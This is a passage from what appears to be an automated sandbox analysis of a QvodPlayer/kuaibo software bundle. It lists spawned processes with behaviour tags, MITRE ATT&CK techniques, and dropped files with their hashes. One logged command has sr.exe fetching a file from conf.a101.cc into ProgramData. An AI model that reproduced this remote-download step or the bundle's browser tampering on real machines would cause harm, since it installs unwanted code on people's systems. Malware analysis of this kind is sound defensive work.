  "C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:484
- - C:\Program Files (x86)\tools\BaiduP2PService.exe
    "C:\Program Files (x86)\tools\BaiduP2PService.exe" init
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:276
- - C:\Program Files (x86)\tools\sr.exe
    "C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\
    3⤵
    - Executes dropped EXE
    PID:2140
- - C:\Program Files (x86)\tools\BaiduP2PService.exe
    "C:\Program Files (x86)\tools\BaiduP2PService.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Browser Extensions

T1176

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe

Filesize
737KB

MD5
70105bc3ddcf9dffa3b47cc3f1e6ad6a

SHA1
d531771f6a927f9be824ebdff21cc8545f5172aa

SHA256
086da25438d3a85f533a5d982086216e0f17774030aec5d1a5efda10207d1f11

SHA512
79eb7ce814d2c238538d0101681a59613301b2bbeee8d59db31f342fc408d0613278607d003f9241178ae0b35a8dbdde2a299ef76fb502e9edb367ac0cbb3f4c

Download Submit
C:\Program Files (x86)\QvodPlayer\tools.exe

Filesize
84KB

MD5
e3468ff5b750ad47812ad274a861a70e

SHA1
6fb52df5cc44e2e831526e852dd62ea907e9627f

SHA256
46460637b57539bd495a4c3f5709df1e277067baf3a54b55d5ad8f19a1a4a15a

SHA512
ce43c8e7ddb5fc7e323ecfb12a90fc143e2f2d6d5ceec1514adde901c6dcb9d993952a753c740e0a4942f0d0881c9e5802870056a9099e167c38bbb2952208a8

Download Submit
C:\Program Files (x86)\tools\P2PBase.dll

Filesize
496KB

MD5
a86a90ba120c455ac0e3655f146d5a0f

SHA1
277c55191fbbadf888626df4fba279591632a406

SHA256
577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43

SHA512
a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47

Download Submit
C:\Program Files (x86)\tools\P2PStatReport.dll

Filesize
364KB

MD5
3b14cae0ea1d045bb5b196017913edb3

SHA1
7ca456595148f2d5e71444a612f2351c4cd8a20d

SHA256
a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982

SHA512
6c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200

Download Submit
C:\Program Files (x86)\tools\P2SBase.dll

Filesize
512KB

MD5
894ab861e608eacbac24280ab234368f

SHA1
e283ef8757f04b0252ec5dce22e6e8094bed7737

SHA256
687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb

SHA512
26a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\快捷导航\打折网购.lnk

Filesize
1KB

MD5
bb458f2de27e1c5bb2e47bc17b2493c9

SHA1
612ad72a8912d89b24181283559375edae28bd65

SHA256
fb4c1075a7a3dbcb182d56b360bee35661dff8c01b93be7a35d3d0f09d94c4be

SHA512
28dc5148e80cf6adc84f20121504aa66049c1f8f44228b6251d3ac8d4ee7f628b33f21583ff643aeef2abaec4aa827a1c6f0f099564b680c93916bdaaad2a4e8

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\快捷导航\网址导航.lnk

Filesize
1KB

MD5
5c1d7fbd3db6de8bbc61367dcb120037

SHA1
add34fc8549c89892d4297453e5f967c61a3211d

SHA256
9b91cf4961cc3ec1e06e2d06a9cd99470854598ef13616da987730c24d0582d5

SHA512
b9477a1e11f6b8b064e3b79b1479b86e98e4a3bcea20d6ef3a18791fea0385e2d35fb852f8f92e69c67e05d45d489bba21a874697d114afb6e22a7709e3fc3a1

Download Submit
C:\ProgramData\tools\daohang.ico

Filesize
73KB

MD5
86bfbd03d0c9f29596f28a2fe3fbd8c5

SHA1
77dc2aa526f15939faaad58a1448ed7f3bd40c73

SHA256
5e0200348c6c5eff6ab50fd917d291d962d44d5d84efdde5223ee22ef13bb99a

SHA512
36cdc02d0e6d76ac77b74c3762d7d332dd5a0dd733a658c2548a87a5491924a94500430886e7866722c1b6e0b08014d0e50bbe684aebeb99930821ed7c75cc84

Download Submit
C:\ProgramData\tools\daohang_.ico

Filesize
17KB

MD5
d659e6acc99ae98e6bfdcdd0882d48f3

SHA1
9771b080871e3243a4a63053f3aa7399e0818bb5

SHA256
06f60cb85f786f7ee06a284458403a5e5d69c30eaaff7480a30574c43a9c9055

SHA512
2b2fab17af2ed147d5b07eda9e6bdee0507f8c38d1aa8f89d8c48ae073ad3313631ac1aaf062020a40c71595f95d97d89fac79bab3ba15cce43b66767795be40

Download Submit
C:\ProgramData\tools\ie10.ico

Filesize
66KB

MD5
0dd21d0a21f47a54bdd4a8344c870839

SHA1
f714a9e6062697ffe3bec31690f44579f2809b69

SHA256
053eaa1b94f5d4ecdc740a338987580feef9d9fa6e994a9e9f17a0dac55612f7

SHA512
9734cb39ae46ece49663ed63359521d5c327885c2de320419b0d2472dbeb6158e4f4c40d047d404c5f2643be6fd1eba3c9b02d6e1ede44e76b9daf0e70f9cb68

Download Submit
C:\ProgramData\tools\ie6.ico

Filesize
17KB

MD5
bf69cff7e66a3aa109dda84eb0232813

SHA1
a5d83c6a2a3adc896a1eba23cd2db139e580d713

SHA256
1c4494e1b1b52d5c9ef5142f084f950cd986159f9652277c496b48ef19d927c4

SHA512
2a842f34dd57854523cc597851bcf4c094653e02ffc8d80228ab1e52742c12c26c19a9137685f202cb93a5c54838c985a814d29c0f9466fb616067bb273ef39a

Download Submit
C:\ProgramData\tools\ie8.ico

Filesize
17KB

MD5
c3e81d293ff596acd5596573c5bc0d92

SHA1
24f7eb541cf59abea6352b53a0b26392f9956017

SHA256
56a625bd2b7aee97368e92154c25da550dad3067b4c2f7f934cba21f40fa5f96

SHA512
e9b150e46493825ffa9aae71fe98579fc04e517398cb97bb473c98544b49022a0851928c95c9f2114bf40b6e113165b5bae5184a08fb18850550ee0af7515ea6

Download Submit
C:\ProgramData\tools\sougou_search.ico

Filesize
17KB

MD5
d9f97bbefebd7f6680a5cd7e428e7c6e

SHA1
b8f27fd1cecd21a0d893cd6c4d2900fcf5e657a9

SHA256
bb445582d1ea6728c3ef6836d0523b3d36b36f3ebc1206cdfcde1ef92493f506

SHA512
5808b085bdb028dae82434b255a0b1da3391409942899ecd4a7a01734e617f5e11a28d56e01d82aace80e5e37f395f43113cc8e96b532726388818f3c41d7f5d

Download Submit
C:\ProgramData\tools\taobao.ico

Filesize
17KB

MD5
530ea7b66b1ada5f28cc390d95c124be

SHA1
48f3e4bf67fff6958c27632d08c93b3e384a7406

SHA256
42a6eda959bcdf843ab794cfd26755baaacccd53482a3e5773155516c2d1b585

SHA512
155915195f006a3a971b7b923e858558238f821b5b990a28d6daa1decf57ed4ae0dd06ba80dbc37cac1b693cdfcd5b99a03fb9fa892dfd30b07bb1de112a3f78

Download Submit
C:\Users\Admin\AppData\LocalLow\Baidu\BaiduPlayer\P2PCfg.ini

Filesize
144B

MD5
7522d12de6c344689f88cae465e11bd8

SHA1
891436d592ba8e4f0ef758ee4c354c2a59650989

SHA256
39ada8b8fcd9383f3cbc750577778a7dccedbea3220de3c0c1f0b3e98d464c51

SHA512
7781a85e72347c34e1b5d3ce2c6b265dc57925886a38d83bcc61f2cddcf30576fd2320c001fbf28a954c32d5d4d9a45a3211049ba660ce55379ed207772efb14

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj95AD.tmp\nsTools.dll

Filesize
262KB

MD5
69fcb9ae215b1397ae1f9751da7016d0

SHA1
da3816591f15fcdae48910fb632ee5d2f8c09d4d

SHA256
ba5b2e57997aae2ce636a76e8ffc536498bf3882d61648f30c169cc17fd1f342

SHA512
f9c6aa7b420b1e18ab7e7351f4d228e5b2fd047fc70e170b037efda0bca4b5ff146f6457f477aeaecf829e42d3c730530483c240e0b1de98aef217c2bcc56689

Download Submit
C:\Users\Admin\AppData\Local\Temp\nst98A9.tmp\ioSpecial.ini

Filesize
706B

MD5
bcf804d71d08b4f4a80dab1ddb10d0ac

SHA1
7de915aa9ada386e83f626447937b968fcdab26e

SHA256
ab69a441c1ee28a78794cbd43a29be20bb26ed63439050e60529efa7d45f86b9

SHA512
51eb3bbaaff7422e85ab399737d0905c0e74055982e7b2080f1ec96b528a8ecb7a19ece4aac700367c42323559ce0ea32904c892f32893586b0b06c223731a03

Download Submit
C:\Users\Admin\AppData\Local\Temp\nst98A9.tmp\ioSpecial.ini

Filesize
784B

MD5
234dd9fae11f1c36d2a3933a7b5d8418

SHA1
cc5685ed7c461f0e02cf2e9e923c13db477dbd3c

SHA256
7c553a63ad9ef21ac769bb3b6eebf6a5dd0a8d4a0f4e85fb2c0b04413b39b800

SHA512
2e744209cd4053269794d3ec74320b45c415c6707657d45f5e98441daea2a6f51ed8b578105502b170edc2440df38ac23a22337b754bf2751830600a0a01aa34

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsyBE42.tmp\nsTools.dll

Filesize
260KB

MD5
6ae9eaa868bcb42ae79bf9701b18e7ec

SHA1
80bd26a403aaee21fc2b9af0d5585a768ea3acd0

SHA256
d4fb435c03841d4911cba57bd01212156d4a0ab4554e5a25b3604e43b3622fb5

SHA512
06c60bb27b39064c237e52d3ccea2371953fc454321eab2046ffcb5cc9771206accb0124fdf1726d5cf821906ee05e03dc7ae9ca2534f6543e585382a9c0a688

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (2).lnk

Filesize
1KB

MD5
5f1256fc9544b3140dd8b8b190aa9fba

SHA1
77f36e320a2e6af49a2a80fde17817264c969191

SHA256
7841633dd23bfbc828defcffef3a2c7767de24cb36acc33987108488a0ba0286

SHA512
cfb83517e8b5ef888f0517b1583e753cc07249acd20e9e229796449dd860309f200d04e54a6370ede3eea4b49cdcdddb8a7c092f509e77a31c18a816596553c7

Download Submit
C:\Users\Admin\Desktop\Intrenet. Expleror.lnk

Filesize
938B

MD5
9df285edc714a07907240754fee63716

SHA1
1397787e4a178f305b062f12e0f21e7dcd2e8802

SHA256
1c76b432b5d2063a11ec3c3d376e0c269803b8bc079e722a0f901073f0c48669

SHA512
8f6e0188c9f48ff23062404560ea7180485840bbe7c989f5573191f5a86b80ac29c692e923af85f6fe8f2e4bdc4989e40f8bbea69e9641a41e3b474a35b209c6

Download Submit
\Program Files (x86)\QvodPlayer\NetUtil.dll

Filesize
134KB

MD5
f35c3050cf7db1095c50b788f2a8fca8

SHA1
2279c47413f9ea033eb12a275f56104c9c4cdf72

SHA256
df2fdefb72a3c8c346726c9e2788d8e84cfff44652abf235d86e8e2a618058f4

SHA512
7e6a9298903c3a94bca054e8333fc27cc588f4ffe493f42f98486888b297a265f9cd9dde38c592ca953ee64bbe364e7f6da64aaae231b43aca05055ae597f05d

Download Submit
\Program Files (x86)\QvodPlayer\PlayCtrl.dll

Filesize
163KB

MD5
4907451bf7537380a4b0fac6b73d7ebd

SHA1
2d0fe6b1909a7aa4f872bbeb1fe7d0f52e655f59

SHA256
9c3934025f4711ac3c1c49e7777505fca44ad750b69b714eca4a274b9287c9a2

SHA512
2e054c08926c91ee4bac9ac7366a0ab1c184a98d9ac64ea14744e8d37e26672dc4ec20abaa788856ff5002dc543cc78d9c090ba05de18ca262ec19b3e6e33a83

Download Submit
\Program Files (x86)\QvodPlayer\QvodStatistic.dll

Filesize
112KB

MD5
bd4a461f7acb661d1bda3e9dc0b2175c

SHA1
3b4d5eb452d0d65a0c534c8411f2db8ffd3503df

SHA256
bfde8938d04dba3027f448082c04e544f244f622282e3acd3f65fadb060e2eda

SHA512
3e48cdc1a88701b4c9d6b78439064b56a113cbaef17310d155b17740396be5414cf17efdf8bd422b99bbfedaf079e608cf7ad263ae2c904ab1986da24a12a987

Download Submit
\Program Files (x86)\QvodPlayer\kuaibo.exe

Filesize
3.2MB

MD5
f31f3458c48c12fa3d162a0bd2cbe15c

SHA1
54b652afd8dc0ebbe28efa9fd0f7c307c649c800

SHA256
6aa930e3e237db31ebd8df64e839767c3b21a9d310a941e4f6f2cb1fafd98210

SHA512
91f0642b9f08337237ee127cb0488fd21716b5c3bea649c8668cc52de2f4903fc154f38d7f8121dab4ff312da40a80a370f9115d86f828d2000ac27f765955e7

Download Submit
\Program Files (x86)\QvodPlayer\npQvodInsert.dll

Filesize
661KB

MD5
0a6324504898ad0410efd545c9751399

SHA1
ba5c1251dd11f9f1df1536fed808c907fa796043

SHA256
cec6ed44920f1ec1b092d2c7f0114f043092c734b26c964611e138e43fe57889

SHA512
a9e61904af3cb8e36ea9b739f62218857a521a197eb7078af4fb3f4c570f0c5c706de1e27a2206ce949e5a70ee4e4e9ba2a5b9859be6a424e65610a1b02725bd

Download Submit
\Program Files (x86)\QvodPlayer\qvodupdate.exe

Filesize
361KB

MD5
45f4ac3edd1eb1163e799405af06d72c

SHA1
d542663c99e67541af90c25f8d1349bb1c4cfbf3

SHA256
5729d4ac29b8b36c9d7eefd553a584fd25ada253cdf1ca9e471d80de2a3f7c8b

SHA512
58857ad1260157b4861ea940de9ee322a5a369fb0c0b0a7fb072806cde06c7bb17dc5a415505cb96685f1dffae49d148e032b36c3fd94b78afa5b8bd0562ac06

Download Submit
\Program Files (x86)\tools\BaiduP2PService.exe

Filesize
508KB

MD5
012a8879efa6f8dbc3c6ba58a659fefb

SHA1
d2a2dac321ff5a78de52e926044ba362f4004cde

SHA256
774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66

SHA512
b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba

Download Submit
\Program Files (x86)\tools\sr.exe

Filesize
154KB

MD5
83bcf3ad82ce65d2bd0fdd364fe32cb5

SHA1
32c5080bbf51dd22bed7f594a92f753a25eef73c

SHA256
5635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d

SHA512
852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81

Download Submit
\Users\Admin\AppData\Local\Temp\nsj95AD.tmp\System.dll

Filesize
11KB

MD5
959ea64598b9a3e494c00e8fa793be7e

SHA1
40f284a3b92c2f04b1038def79579d4b3d066ee0

SHA256
03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b

SHA512
5e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64

Download Submit
\Users\Admin\AppData\Local\Temp\nst98A9.tmp\InstallOptions.dll

Filesize
15KB

MD5
67d8f4d5acdb722e9cb7a99570b3ded1

SHA1
f4a729ba77332325ea4dbdeea98b579f501fd26f

SHA256
fa8de036b1d9bb06be383a82041966c73473fc8382d041fb5c1758f991afeae7

SHA512
03999cc26a76b0de6f7e4e8a45137ee4d9c250366ac5a458110f00f7962158311eea5f22d3ee4f32f85aa6969eb143bdb8f03ca989568764ed2bc488c89b4b7f

Download Submit
memory/276-219-0x0000000000290000-0x0000000000314000-memory.dmp

Filesize
528KB

Download
memory/276-215-0x0000000000230000-0x000000000028D000-memory.dmp

Filesize
372KB

Download
memory/484-229-0x00000000003B0000-0x00000000003F8000-memory.dmp

Filesize
288KB

Download
memory/1224-47-0x0000000006780000-0x00000000067C6000-memory.dmp

Filesize
280KB

Download
memory/1984-300-0x00000000076D0000-0x00000000076F2000-memory.dmp

Filesize
136KB

Download
memory/1984-296-0x00000000076A0000-0x00000000076C0000-memory.dmp

Filesize
128KB

Download
memory/1984-291-0x00000000075E0000-0x0000000007689000-memory.dmp

Filesize
676KB

Download
memory/1984-304-0x0000000007700000-0x0000000007729000-memory.dmp

Filesize
164KB

Download
memory/2844-32-0x0000000000400000-0x000000000052A000-memory.dmp

Filesize
1.2MB

Download
memory/2844-195-0x0000000000400000-0x000000000052A000-memory.dmp

Filesize
1.2MB

Download
memory/2844-0-0x0000000000400000-0x000000000052A000-memory.dmp

Filesize
1.2MB

Download
memory/2844-137-0x00000000025B0000-0x00000000025F8000-memory.dmp

Filesize
288KB

Download